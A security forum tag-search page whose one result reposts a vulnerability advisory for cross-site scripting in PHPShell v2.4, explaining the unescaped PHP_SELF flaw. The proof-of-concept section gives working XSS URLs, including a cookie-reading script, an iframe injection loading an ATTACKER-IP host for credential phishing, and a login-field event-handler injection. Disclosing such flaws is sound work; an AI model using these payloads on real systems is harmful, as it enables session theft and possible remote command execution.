Jump to content

Search the Community

Showing results for tags 'phpshell v2.4'.

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Joined

  • Start

    End

Group

Website URL

Yahoo

Jabber

Skype

Location

Interests

Biography

Location

Interests

Occupation

Found 1 result

  1. geeko
    [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt [+] ISR: ApparitionSec Vendor: ========== sourceforge.net/projects/phpshell/ phpshell.sourceforge.net/ Product: ============= PHPShell v2.4 Vulnerability Type: ==================== Cross Site Scripting CVE Reference: ============== N/A Security Issue: ================ Multiple cross site scripting entry points exist in PHPShell undermining the integrity between users browser and server. Allowing remote attackers to bypass access controls such as the same-origin policy. If an authenticated user clicks an attacker supplied link. XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL, PHPShell simply reads our XSS payload in the URL and echoes it back to client. <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post"> Since PHPShell purpose is to execute system commands this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell. Reference: " http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt " Tested successfully in Firefox Exploit/POC: ============= XSS 1) http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E OR Inject IFRAME to phish and steal credentials, you get the idea. http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!-- XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php On the Login Authentication HTML form 'username' input field " onMousemove="alert(document.cookie) enter a password and hit Enter. Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: =============================== Vendor Notification: No reply In addition the INSTALL file "Bugs? Comments?" Tracker System link is HTTP 404 http://sourceforge.net/tracker/?group_id=156638 February 18, 2017 : Public Disclosure
×
×
  • Create New...